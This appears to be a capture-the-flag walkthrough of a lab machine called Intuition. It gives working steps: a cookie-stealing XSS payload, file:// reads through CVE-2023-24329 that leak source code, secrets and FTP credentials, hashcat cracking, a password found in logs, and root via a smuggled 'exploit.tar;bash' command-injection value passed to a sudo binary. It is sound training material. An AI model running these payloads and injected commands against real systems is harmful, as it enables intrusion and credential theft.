This is an Ubuntu 22.04 machine used for bug reporting via web forms. We can gain access to the web application admin dashboard by stealing cookies via XSS payloads. Then we exploit CVE-2023-24329 in Python-URLlib 3.11 to explore the file system and find an SSH private key which allows obtaining the user flag. Regarding escalation, first we move laterally to another user, then we do reversing on a custom binary to discover it is vulnerable to command injection.
XSS, CVE-2023-24329, Python-URLlib 3.11, Hashcat mask attack, Ghidra, reversing, command injection.
Port scan.
Copy > nmap $target -p- --min-rate = 5000 -Pn --open --reason
Starting Nmap 7.93 ( ) at 2024-04-28 17:04 EDT
Nmap scan report for
Host is up, received user-set (0.036s latency ).
Not shown: 57729 closed tcp ports (conn-refused), 7804 filtered tcp ports ( no-response )
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Nmap done: 1 IP address (1 host up ) scanned in 15.30 seconds
Enumerate the open ports.
Copy > nmap $target -p22,80 -sV -sC -Pn -vv -n
Starting Nmap 7.93 ( ) at 2024-04-28 17:05 EDT
Nmap scan report for
Host is up, received user-set (0.034s latency ).
Scanned at 2024-04-28 17:05:24 EDT for 8s
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.7 (Ubuntu Linux ; protocol 2.0 )
| ssh-hostkey:
| 256 b3a8f75d60e86616ca92f676bab833c2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLS2jzf8Eqy8cVa20hyZcem8rwAzeRhrMNEGdSUcFmv1FiQsfR4F9vZYkmfKViGIS3uL3X/6sJjzGxT1F/uPm/U=
| 256 07ef11a6a07d2b4de868791a7ba7a9cd (ED25519)
| _ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFj9hE1zqO6TQ2JpjdgvMm6cr6s6eYsQKWlROV4G6q+4
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
| _http-title: Did not follow redirect to http://comprezzor.htb/
| http-methods:
| _ Supported Methods: GET HEAD POST OPTIONS
| _http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux ; CPE: cpe:/o:linux:linux_kernel
Nmap done: 1 IP address (1 host up ) scanned in 9.36 seconds
Fuzz for subdomains.
Copy > ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -fc 404,301 -t 100 -u http://comprezzor.htb -H "Host: FUZZ.comprezzor.htb"
/ '___\ /' ___\ / '___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL : http://comprezzor.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
:: Header : Host: FUZZ.comprezzor.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 100
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 404,301
auth [Status: 302, Size: 199, Words: 18, Lines: 6, Duration: 43ms]
report [Status: 200, Size: 3166, Words: 1102, Lines: 109, Duration: 52ms]
dashboard [Status: 302, Size: 251, Words: 18, Lines: 6, Duration: 48ms]
:: Progress: [4989/4989] :: Job [1/1] :: 237 req/sec :: Duration: [0:00:08] :: Errors: 0 ::
Add to hosts
file. Navigate to http://report.comprezzor.htb and click on "Report bug" (you'll need to sign up a new account).
The report submission form is vulnerable to XSS in both "Title" and "Description" boxes. Insert this payload to steal a cookie.
Copy < script >new Image().src=""+document.cookie;</ script >
A cookie encoded in base64 is received on the listener, after decoding it we see it belongs to user adam
Use the cookie to login as adam
and navigate to http://dashboard.comprezzor.htb , a list of reported bugs comes into view.
Click on each report ID to browse the incident data.
The report will be read by the admin as long as priority is set to 1. Adam has permission to change priorities so using his credentials (i.e. his cookie) we will send another report with the same XSS payload. Then set the priority to 1, it will be read by the admin and we will be able to steal admin's cookie.
Shortly after, admin's cookie is received on the listener.
Use the cookie to log in as admin, now a new functionality to generate PDFs is enabled.
The application takes a URL and converts its contents to PDF. Start an HTTP server and enter your IP in the URL field, capture the traffic with Wireshark and inspect it. In the HTTP headers we see the host is using the library python-urllib 3.11
There is a CVE-2023-24329 ( ) affecting this version. Description reads: "Attackers can bypass blacklisting methods by supplying a URL that starts with blank characters".
Let's try using this payload file:///etc/os-release
. Note there is with a blank space at the beginning as indicated in the CVE description.
The application dumps the OS info, so the vulnerability is confirmed.
Let's take advantage of this and enumerate the file system to find useful info. First, list the running process (remember there is a blank space at the beginning of the payloads).
Copy file : /// proc / self / cmdline
python3 / app / code / app . py
Inspect the application source code.
Copy file : /// app / code / app . py
from flask
import Flask , request , redirect from blueprints . index . index
import main_bp from blueprints . report . report
import report_bp from blueprints . auth . auth
import auth_bp from blueprints . dashboard . dashboard
import dashboard_bp
app = Flask ( __name__ ) app . secret_key = "7ASS7ADA8RF3FD7"
app . config [ 'SERVER_NAME' ] = 'comprezzor.htb'
app . config [ 'MAX_CONTENT_LENGTH' ] = 5 * 1024 * 1024 # Limit file size to 5 MB ALLOWED_EXTENSIONS = {
'txt' ,
'pdf' ,
# Add more allowed file extensions
if needed app . register_blueprint (main_bp)
app . register_blueprint (report_bp, subdomain = 'report' ) app . register_blueprint (auth_bp, subdomain = 'auth' )
app . register_blueprint (dashboard_bp, subdomain = 'dashboard' ) if __name__ == '__main__' : app . run (debug = False ,
host = "" , port = 80 )
We see calls to Python libraries. Let's inspect all of them.
Copy file:///app/code/blueprints/auth/
In the last one (
) we find FTP credentials for user ftp_admin
Copy from flask
import Blueprint , request , render_template , flash , redirect , url_for , send_file from blueprints . auth . auth_utils
import admin_required , login_required , deserialize_user_data from
blueprints . report . report_utils
import get_report_by_priority , get_report_by_id , delete_report , get_all_reports , change_report_priority , resolve_report
import random , os , pdfkit , socket , shutil
import urllib . request from urllib . parse
import urlparse
import zipfile from ftplib
import FTP from datetime
import datetime dashboard_bp = Blueprint ( 'dashboard' , __name__ ,
subdomain = 'dashboard' ) pdf_report_path = os . path . join (os.path. dirname ( __file__ ), 'pdf_reports' ) allowed_hostnames = [ 'report.comprezzor.htb' ] @ dashboard_bp . route ( '/' , methods = [ 'GET' ])
@admin_required def dashboard () : user_data = request.cookies.get('user_data') user_info = deserialize_user_data(user_data) if user_info['role'] == 'admin': reports = get_report_by_priority(1)
elif user_info [ 'role' ] == 'webdev' : reports = get_all_reports () return render_template ( 'dashboard/dashboard.html' , reports = reports, user_info = user_info) @ dashboard_bp . route ( '/report/' ,
methods = [ 'GET' ]) @ login_required def get_report ( report_id ): user_data = request . cookies . get ( 'user_data' ) user_info = deserialize_user_data (user_data) if user_info [ 'role' ] in [ 'admin' , 'webdev' ] :
report = get_report_by_id (report_id) return render_template ( 'dashboard/report.html' , report = report, user_info = user_info)
else : pass @ dashboard_bp . route ( '/delete/' , methods = [ 'GET' ])
@login_required def del_report (report_id) : user_data = request.cookies.get('user_data') user_info = deserialize_user_data(user_data) if user_info['role'] in ['admin', 'webdev']: report =
delete_report (report_id) return redirect ( url_for ( 'dashboard.dashboard' ))
else : pass @ dashboard_bp . route ( '/resolve' , methods = [ 'POST' ]) @ login_required def resolve (): report_id =
int (request.args. get ( 'report_id' )) if resolve_report (report_id): flash ( 'Report resolved successfully!' , 'success' )
else : flash ( 'Error occurred while trying to resolve!' , 'error' ) return
redirect ( url_for ( 'dashboard.dashboard' )) @ dashboard_bp . route ( '/change_priority' , methods = [ 'POST' ]) @ admin_required def change_priority (): user_data = request . cookies . get ( 'user_data' )
user_info = deserialize_user_data (user_data) if user_info [ 'role' ] != ( 'webdev'
or 'admin' ) : flash ( 'Not enough permissions. Only admins and webdevs can change report priority.' , 'error' ) return
redirect ( url_for ( 'dashboard.dashboard' )) report_id = int (request.args. get ( 'report_id' )) priority_level = int (request.args. get ( 'priority_level' )) if change_report_priority (report_id, priority_level):
flash ( 'Report priority level changed!' , 'success' )
else : flash ( 'Error occurred while trying to change the priority!' , 'error' ) return redirect ( url_for ( 'dashboard.dashboard' ))
@dashboard_bp . route ( '/create_pdf_report' , methods = [ 'GET' , 'POST' ]) @admin_required def create_pdf_report(): global pdf_report_path
if request . method == 'POST' : report_url =
request . form . get ( 'report_url' ) try : scheme = urlparse (report_url). scheme hostname = urlparse (report_url). netloc
try : dissallowed_schemas = [ "file" , "ftp" , "ftps" ]
if (scheme not in
dissallowed_schemas) and ((socket . gethostbyname (hostname. split ( ":" )[ 0 ]) != '' ) or (hostname in allowed_hostnames)) : print (scheme) urllib_request = urllib . request . Request (report_url,
headers = {
'Cookie' : 'user_data=eyJ1c2VyX2lkIjogMSwgInVzZXJuYW1lIjogImFkbWluIiwgInJvbGUiOiAiYWRtaW4ifXwzNDgyMjMzM2Q0NDRhZTBlNDAyMmY2Y2M2NzlhYzlkMjZkMWQxZDY4MmM1OWM2MWNmYmVhM
response = urllib.request. urlopen (urllib_request) html_content = response. read (). decode ( 'utf-8' ) pdf_filename = f ' {pdf_report_path} /report_{str(random.randint(10000,90000))}.pdf'
pdfkit. from_string (html_content, pdf_filename) return send_file (pdf_filename, as_attachment = True ) except : flash ( 'Unexpected error!' , 'error' ) return
render_template ( 'dashboard/create_pdf_report.html' ) else : flash ( 'Invalid URL' , 'error' ) return render_template ( 'dashboard/create_pdf_report.html' ) except Exception as e: raise e
else : return
render_template ( 'dashboard/create_pdf_report.html' ) @ dashboard_bp. route ( '/backup' , methods = [ 'GET' ]) @ admin_required def backup (): source_directory =
os.path. abspath (os.path. dirname ( __file__ ) + '../../../' ) current_datetime = datetime. now (). strftime ( "%Y%m %d %H%M%S" ) backup_filename = f 'app_backup_ {current_datetime} .zip'
zipfile. ZipFile (backup_filename, 'w' , zipfile.ZIP_DEFLATED) as zipf: for root,
files in os. walk (source_directory): for file in files: file_path = os.path. join (root, file) arcname =
os.path. relpath (file_path, source_directory) zipf. write (file_path, arcname = arcname) try : ftp = FTP ( 'ftp.local' ) ftp. login (user = 'ftp_admin' , passwd = 'u3jai8y71s2' ) ftp. cwd ( '/' ) with
open (backup_filename, 'rb' ) as file: ftp. storbinary (f 'STOR {backup_filename} ' , file) ftp. quit () os. remove (backup_filename) flash ( 'Backup and upload completed successfully!' , 'success' ) except
Exception as e: flash (f 'Error: {str(e)}' , 'error' ) return redirect ( url_for ( 'dashboard.dashboard' ))
Let's see what is inside the FTP.
Copy ftp://ftp_admin:u3jai8y71s2@ftp.local
-rw------- 1 root root 2655 Sep 01 18:40 private-8297.key
-rw-r--r-- 1 root root 15519 Sep 01 18:40 welcome_note.pdf
-rw-r--r-- 1 root root 1732 Sep 01 18:40 welcome_note.txt
The note.txt
is a welcome email from Adam containing the passphrase for the attached private key private-8297.key
To find out the username linked to this private key, just generate the correspondent public key and the user name will be added at the end of the resulting key.
Copy > ssh-keygen -y -f id_rsa
Enter passphrase:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfUe6nu6udKETqHA3v4sOjhIA4sxSwJOpWJsS//l6KBOcHRD6qJiFZeyQ5NkHiEKPIEfsHuFMzykx8lAKK79WWvR0BV6ZwHSQnRQByD9eAj60Z/CZNcq19PHr6uaTRjHqQ/zbs7pzWTs+mdCwKLOU7x+X0XGGmtrPH4/YODxuOwP9S7luu0XmG0m7sh8I1ETISobycDN/2qa1E/w0VBNuBltR1BRBdDiGObtiZ1sG+cMsCSGwCB0sYO/3aa5Us10N2v3999T7u7YTwJuf9Vq5Yxt8VqDT/t+JXU0LuE5xPpzedBJ5BNGNwAPqkEBmjNnQsYlBleco6FN4La7Irn74fb/7OFGR/iHuLc3UFQkTlK7LNXegrKxxb1fLp2g4B1yPr2eVDX/OzbqAE789NAv1Ag7O5H1IHTH2BTPTF3Fsm7pk+efwRuTusue6fZteAipv4rZAPKETMLeBPbUGoxPNvRy6VLfTLV+CzYGJTdrnNHWYQ7+sqbcJFGDBQ+X3QelE= dev_acc@local
Use the private key to open an SSH session in the host.
Which can be used to retrieve the user flag.
Start from the low-priv SSH session and take the opportunity to enumerate the user and the system.
Copy > whoami && id
uid = 1001 ( dev_acc ) gid = 1001 ( dev_acc ) groups = 1001 ( dev_acc )
> uname -a && cat /etc/os-release
Linux intuition 6.5.0-27-generic #28~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 15 10:51:06 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
PRETTY_NAME = "Ubuntu 22.04.4 LTS"
NAME = "Ubuntu"
VERSION_ID = "22.04"
VERSION = "22.04.4 LTS (Jammy Jellyfish)"
ID = ubuntu
ID_LIKE = debian
Enumerate local connections, there is an internal FTP server running.
Copy > netstat -lnput
( Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all. )
Active Internet connections (only servers )
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp 0 0* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0* -
udp 0 0* -
udp 0 0* -
udp 0 0* -
udp6 0 0 :::5353 :::* -
udp6 0 0 :::60825 :::* -
Enumerate local users, we find a new user called lopez
Copy > cat /etc/passwd | grep bash
Navigate to /var/www/app/blueprints/auth
, there is an SQLite database stored there, browse its contents.
Copy > strings users.db
SQLite format 3
CREATE TABLE sqlite_sequence ( name,seq )
password TEXT NOT NULL,
role TEXT DEFAULT 'user'
These are credentials for the internal FTP server. Crack Adam's hash (module 30120).
Copy > hashcat -m 30120 -a 0 -d 1 hash.txt .\rockyou.txt
Connect to FTP using Adam's credentials. Inside, we find 2 files, runner1.c
. This is the code of the first one.
Copy / Version : 1
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <openssl/md5.h>
#define INVENTORY_FILE "/opt/playbooks/inventory.ini"
#define PLAYBOOK_LOCATION "/opt/playbooks/"
#define ANSIBLE_PLAYBOOK_BIN "/usr/bin/ansible-playbook"
#define ANSIBLE_GALAXY_BIN "/usr/bin/ansible-galaxy"
#define AUTH_KEY_HASH "0feda17076d793c2ef2870d7427ad4ed"
int check_auth ( const char* auth_key) {
unsigned char digest[MD5_DIGEST_LENGTH];
MD5(( const unsigned char* )auth_key , strlen(auth_key) , digest) ;
char md5_str[ 33 ];
for ( int i = 0 ; i < 16 ; i ++ ) {
sprintf( & md5_str[i * 2 ] , " %02x " , ( unsigned int )digest[i]) ;
if ( strcmp(md5_str , AUTH_KEY_HASH) == 0 ) {
return 1 ;
} else {
return 0 ;
void listPlaybooks () {
DIR * dir = opendir(PLAYBOOK_LOCATION) ;
if (dir == NULL ) {
perror( "Failed to open the playbook directory" ) ;
return ;
struct dirent * entry;
int playbookNumber = 1 ;
while ((entry = readdir(dir) ) != NULL ) {
if ( entry -> d_type == DT_REG && strstr( entry -> d_name , ".yml" ) != NULL ) {
printf( " %d : %s \n" , playbookNumber , entry -> d_name) ;
playbookNumber ++ ;
closedir(dir) ;
void runPlaybook ( const char * playbookName) {
char run_command[ 1024 ];
snprintf(run_command , sizeof (run_command) , " %s -i %s %s%s " , ANSIBLE_PLAYBOOK_BIN , INVENTORY_FILE , PLAYBOOK_LOCATION , playbookName) ;
system(run_command) ;
void installRole ( const char * roleURL) {
char install_command[ 1024 ];
snprintf(install_command , sizeof (install_command) , " %s install %s " , ANSIBLE_GALAXY_BIN , roleURL) ;
system(install_command) ;
int main ( int argc , char * argv [] ) {
if (argc < 2 ) {
printf( "Usage: %s [list|run playbook_number|install role_url] -a <auth_key>\n" , argv[ 0 ]) ;
return 1 ;
int auth_required = 0 ;
char auth_key[ 128 ];
for ( int i = 2 ; i < argc; i ++ ) {
if ( strcmp(argv[i] , "-a" ) == 0 ) {
if (i + 1 < argc) {
strncpy(auth_key , argv[i + 1 ] , sizeof (auth_key)) ;
auth_required = 1 ;
break ;
} else {
printf( "Error: -a option requires an auth key.\n" ) ;
return 1 ;
if ( ! check_auth(auth_key) ) {
printf( "Error: Authentication failed.\n" ) ;
return 1 ;
if ( strcmp(argv[ 1 ] , "list" ) == 0 ) {
listPlaybooks() ;
} else if ( strcmp(argv[ 1 ] , "run" ) == 0 ) {
int playbookNumber = atoi(argv[ 2 ]) ;
if (playbookNumber > 0 ) {
DIR * dir = opendir(PLAYBOOK_LOCATION) ;
if (dir == NULL ) {
perror( "Failed to open the playbook directory" ) ;
return 1 ;
struct dirent * entry;
int currentPlaybookNumber = 1 ;
char * playbookName = NULL ;
while ((entry = readdir(dir) ) != NULL ) {
if ( entry -> d_type == DT_REG && strstr( entry -> d_name , ".yml" ) != NULL ) {
if (currentPlaybookNumber == playbookNumber) {
playbookName = entry -> d_name;
break ;
currentPlaybookNumber ++ ;
closedir(dir) ;
if (playbookName != NULL ) {
runPlaybook(playbookName) ;
} else {
printf( "Invalid playbook number.\n" ) ;
} else {
printf( "Invalid playbook number.\n" ) ;
} else if ( strcmp(argv[ 1 ] , "install" ) == 0 ) {
installRole(argv[ 2 ]) ;
} else {
printf( "Usage2: %s [list|run playbook_number|install role_url] -a <auth_key>\n" , argv[ 0 ]) ;
return 1 ;
return 0 ;
In the source code we find a hardcoded MD5 hash 0feda17076d793c2ef2870d7427ad4ed
which apparently is used to launch Ansible playbooks.
Let's se what is inside the shell script.
Copy #!/bin/bash
# List playbooks
./runner1 list
# Run playbooks [Need authentication]
# ./runner run [playbook number] -a [auth code]
#./runner1 run 1 -a "UHI75GHI****"
# Install roles [Need authentication]
# ./runner install [role url] -a [auth code]
#./runner1 install -a "UHI75GHI****"
Here we see an incomplete password UHI75GHI****.
Assuming the MD5 hash belongs to the incomplete password, we are able to crack the complete password using a Hashcat mask attack.
Copy > hashcat -m 0 -a 3 -d 1 hash.txt .\rockyou.txt UHI75GHI ? a ? a ? a ? a
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 0 (MD5)
Hash.Target......: 0feda17076d793c2ef2870d7427ad4ed
Time.Started.....: Sun Sep 01 22:19:31 2024 (0 secs )
Time.Estimated...: Sun Sep 01 22:19:31 2024 (0 secs )
Kernel.Feature...: Pure Kernel
Guess.Mask.......: UHI75GHI?a?a?a?a [12]
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 55834.3 kH/s (2.95ms) @ Accel:2048 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests ( total ), 1/1 ( 100.00% ) Digests ( new )
Progress.........: 11796480/81450625 (14.48%)
Rejected.........: 0/11796480 (0.00%)
Restore.Point....: 11010048/81450625 (13.52%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: UHI75GHIX=+k - > UHI75GHIc1GM
Hardware.Mon.#1..: Temp: 45c Util: 98% Core:1126MHz Mem:2505MHz Bus:16
Started: Sun Sep 01 22:19:23 2024
Stopped: Sun Sep 01 22:19:33 2024
Take note and continue enumerating the file system. There is a directory in /opt/runner2
but current user does not have permissions.
Copy > cd runner2
-bash: cd: runner2: Permission denied
We are going to need to move laterally to another user, and user lopez
is the only possibility left. In the path /var/log/suricata
there are several logs compressed in .gz
, let's hunt for passwords.
Copy > zgrep --color = always -iwn pass eve*.gz
eve.json.9.gz:12477:{"timestamp":"2023-09-28T17:44:48.188361+0000","flow_id":1218304978677234,"in_iface":"ens33","event_type":"ftp","src_ip":"","src_port":45760,"dest_ip":"","dest_port":21,"proto":"TCP","tx_id":2,"community_id":"1:hzLyTSoEJFiGcXoVyvk2lbJlaF0=","ftp":{"command":"PASS","command_data":"Lopezz1992%123","completion_code":["230"],"reply":["Login successful."],"reply_received":"yes"}}
Move laterally to lopez
and verify he has access to directory /opt/runner2
. We also discover he is a sudoer.
Copy > sudo -l
Matching Defaults entries for lopez on intuition:
env_reset, mail_badpass, secure_path=/usr/local/sbin \: /usr/local/bin \: /usr/sbin \: /usr/bin \: /sbin \: /bin \: /snap/bin, use_pty
User lopez may run the following commands on intuition:
( ALL : ALL ) /opt/runner2/runner2
Inside the /opt/runner2
directory we find a binary called runner2
Copy > file runner2
runner2: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, BuildID[sha1] = e1d85ed284e278ad7ab92c2208e4d34cbdceec24, for GNU/Linux 3.2.0, not stripped
We have already found before the source code for runner1
, but not for runner2
, so there is no other option but to do reversing of this file.
Decompile runner2
with Ghidra and inspect the main()
function. Here we can draw some conclusions.
The application takes role_file
and auth_code
as arguments.
is sent to function check_auth()
as argument.
Application expects an "action" called "install".
is sent to function installRole()
as argument.
Continue and inspect the 2 functions check_auth()
and installRole()
In check_auth()
we see the auth_code
is with the MD5 hash we found before. So there is a high probability this key is the password we have already cracked.
Now let's inspect the installRole()
First, the function checks if the file is in .tar
format. Secondly, we see the application takes role_file
and passes it to the ansible-galaxy
binary. Since we control this role_file
parameter and it is used without sanitization, this function may be vulnerable to command injection.
To summarize, the app takes a user JSON as input, and it looks inside it for role_file
and auth_code
. The first one must be in .tar
format, the path to this file is not sanitized and therefore the function is vulnerable to command injection. To execute this vulnerable installRole()
function we have to select the "install" action. Finally, the auth_code
is needed to execute the binary, and it is the password we cracked before.
Bearing this info in mind, let's prepare the attack. First create a .json
including a path to a .tar
file. To exploit the command injection we concatenate a command (using a semicolon ";") in the file name.
Copy {
"run" : {
"action" : "install" ,
"role_file" : "exploit.tar;bash"
} ,
"auth_code" : "UHI75GHINKOP"
Now create a .tar
file containing whatever content, for example, the JSON itself. Make sure it is named after the command injection payload we used in the JSON file.
Copy > tar cfv exploit.tar\; bash exploit.json
Finally, execute the binary with sudo
You are root.